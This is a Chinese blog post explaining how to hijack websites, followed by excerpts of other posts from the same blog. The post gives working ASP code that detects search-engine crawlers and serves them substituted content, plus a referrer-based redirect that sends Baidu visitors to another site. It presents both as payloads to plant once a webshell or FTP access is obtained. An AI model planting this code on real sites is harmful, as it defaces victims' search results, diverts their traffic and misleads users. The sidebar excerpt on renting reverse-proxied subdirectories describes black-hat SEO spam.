跳至主要内容

网站劫持操作方法

这两天看到有网友问网站引擎劫持,网站快照劫持,新闻源劫持是怎么操作的。结果大多数网友都表示不了解,我今天来跟大家分享一下网站劫持是怎么操作的。

1.网站快照劫持

动态页面首页通过在PHP或者ASP,ASPX文件中添加判断代码,判断如果是蜘蛛访问就修改标题内容,在标题内容写入联系方式和非法广告信息,如果不是蜘蛛访问就不做修改。

静态页面首页,在下午三点左右删除你的.html文件,添加inde.php,php中写入类似上面的语句,如果是蜘蛛就返回修改了标题的首页内容,不是就返回正常内容。

快照劫持比较讨厌,就算你修复了劫持,百度上还是会显示很长一段时间的非法快照信息。

20170103201931_94733.jpg

代码如下:

<%

function GetBot()

‘查询蜘蛛

dim s_agent

GetBot=””

s_agent=Request.ServerVariables(“HTTP_USER_AGENT”)‘关键判断语句

if instr(1,s_agent,”googlebot”,1)>0 then

GetBot=”google”

end if

if instr(1,s_agent,”msnbot”,1)>0 then

GetBot=”MSN”

end if

if instr(1,s_agent,”slurp”,1)>0 then

GetBot=”Yahoo”

end if

if instr(1,s_agent,”baiduspider”,1)>0 then

GetBot=”baidu”

end if

if instr(1,s_agent,”sohu-search”,1)>0 then

GetBot=”Sohu”

end if

if instr(1,s_agent,”lycos”,1)>0 then

GetBot=”Lycos”

end if

if instr(1,s_agent,”robozilla”,1)>0 then

GetBot=”Robozilla”

end if

end function

Function getHTTPPage(Path)

t=GetBody(Path)

getHTTPPage=BytesToBstr(t,”GB2312″)’编码

End function

Function Newstring(wstr,strng)

Newstring=Instr(lcase(wstr),lcase(strng))

if Newstring<=0 then Newstring=Len(wstr)

End Function

Function GetBody(url)

on error resume next

Set Retrieval=CreateObject(“Microsoft.XMLHTTP”)

With Retrieval

.Open“Get”,url,False,“”,“”

.Send

GetBody=.ResponseBody

End With

Set Retrieval=Nothing

End Function

Function BytesToBstr(body,Cset)

dim objstream

set objstream=Server.CreateObject(“adodb.stream”)

objstream.Type=1

objstream.Mode=3

objstream.Open

objstream.Write body

objstream.Position=0

objstream.Type=2

objstream.Charset=Cset

BytesToBstr=objstream.ReadText

objstream.Close

set objstream=nothing

End Function

Dim wstr,str,url,start,over,dtime

if GetBot=”baidu”then

‘给百度蜘蛛定制的内容

url=”http://baidu.seowhy.com”

‘想要展示给蜘蛛的页面地址

wstr=getHTTPPage(url)

body=wstr

response.write“”&body&””

response.end

elseif GetBot=”google”then

‘给google蜘蛛定制的内容

url=”http://baidu.seowhy.com”

wstr=getHTTPPage(url)

body=wstr

response.write“”&body&””

response.end

end if

%>

2.搜索引擎流量劫持

这种劫持比快照劫持简单,直接在首页添加,判断访问来路是搜索引擎还是其它的JS代码,当来路是搜索引擎的时候就跳转到目标站。

代码如下:

<%

if instr(Request.ServerVariables(“http_referer”),”www.baidu.com”)>0 then

‘如果用户来自www.baidu.com

response.redirect(“http://baidu.seowhy.com/”)

‘跳转指定地址end if%>

3.DNS白菜站劫持

在域名解析里添加泛解析到目标地址,在目标地址主机上大量生成劫持域名的子站。

总结:1和2需要获得网站的WEBSHELL或者FTP,如果获得了新闻源网站的这种权限,就可以做新闻源劫持;3需要获得DNS管理帐号。所以造成网站被劫持的主要原因还是自己网站被入侵,或者被扫FTP的挖掘机扫出了FTP帐号等,网络安全没做好的原因。所以只要网络安全到位,别人是劫持不你的网站的。

评论

此博客中的热门博文

比特币十年江湖,没有财富神话,更多的是血泪传奇。

比特币十年江湖 没有财富神话 更多的是血泪传奇

引语 风起于青萍之末
比特币圈(简称“币圈”)比任何一个圈子都具有江湖习气。 构成这个江湖的大多数人都是籍籍无名之辈,他们从一开始就不属于时代主流力量。 所以,他们的行事做派极其草莽,动辄撸串,怒则撕逼。他们的口号是“一币一嫩模”“一币一别墅”,他们的信仰是“守币如守寡”。 传统的互联网圈、金融圈、区块链圈觉得这是一个loser的世界,但是这些人眼高于顶,自命不凡,叛逆心极重。 他们不甘心在BAT画好的版图里闪展腾挪,在他们眼中,比特币这个法律照不到的灰色角落,正是风起于青萍之末时。 格局未定,真假莫辨,十年币圈,财富无限,无论币涨币跌,依旧无限可能。这就是比特币的世界。 01. 中国比特币史上最神秘的人物:烤猫 谈到比特币,一定要说到烤猫。

什么是反向代理解析二级目录,泛目录?

问题分成两个部分:
1:什么是二级目录和泛目录?
2:这里所说的反向代理是什么意思?
1:什么是二级目录和泛目录?什么是二级目录?
举个例子:www.xxx.com ,www.xxx.com/app/就是一个目录名为“app”的二级目录,假设你租用这个目录,你可以在www.xxx.com/app/里发布你的内容页面。假设你发布1万个页面,每个页面包含一个关键词,搜索引擎收录1条就会有一个关键词会在搜索引擎获得排名,长尾词很容易获得靠前排名。现今有很繁殖内容页面的程序,自动提取你准备好的关键词,蜘蛛或者用户访问这个页面会一直无限繁殖下去,一个页面一个url链接地址(符合目录规则)。也有一些“”万词霸屏“”的网络推广公司,用统一的模板、程序,让他们的客户提供内容发布。
什么是泛目录?
www.xxx.com/app/是二级目录,泛目录的意思就是app这个目录名可以泛,www.xxx.com/app1、www.xxx.com/appd、www.xxx.com/app456,app后面无论带什么字母、数字的目录都可以给你用,也就是你可以用无数这个网站的二级目录,但是必须是固定前缀开头的。(也可以固定中间,固定尾缀,但是一般很少人用)。
2:这里所说的反向代理是什么意思?前面说你租用www.xxx.com/app/ 这个目录,那么你怎么租呢,你需要随时随地的发布、更改内容,配置程序,作为站长总不能把服务器给你吧?这个时候站长就需要通过反向代理来让你实现在你的服务器上操作这个目录。反向代理是站长需要操作的事情,跟你无关,换句话说你是租用者,不需要懂怎么反向代理。但是租用者也不是什么都不需要干的,租用者要提供给站长建好的需要发布的内容的地址和想要使用的目录名,地址打开要符合二级目录或者泛目录的规则。还是租www.xxx.com/app/这个二级目录,租用者用服务器ip建站,配置内容页面,内容程序,配置好后所有内容页面必须在ip/app/下打开,ip/app/打开的内容和www.xxx.com/app/打开的内容是一样的,因为后者就是读取前者的内容。同理,如果是泛目录,ip/app2能打开www.xxx.com/app2也能打开。
对于站长来讲,反向代理二级目录和泛目录的区别是仅仅是解析规则上的细微差异。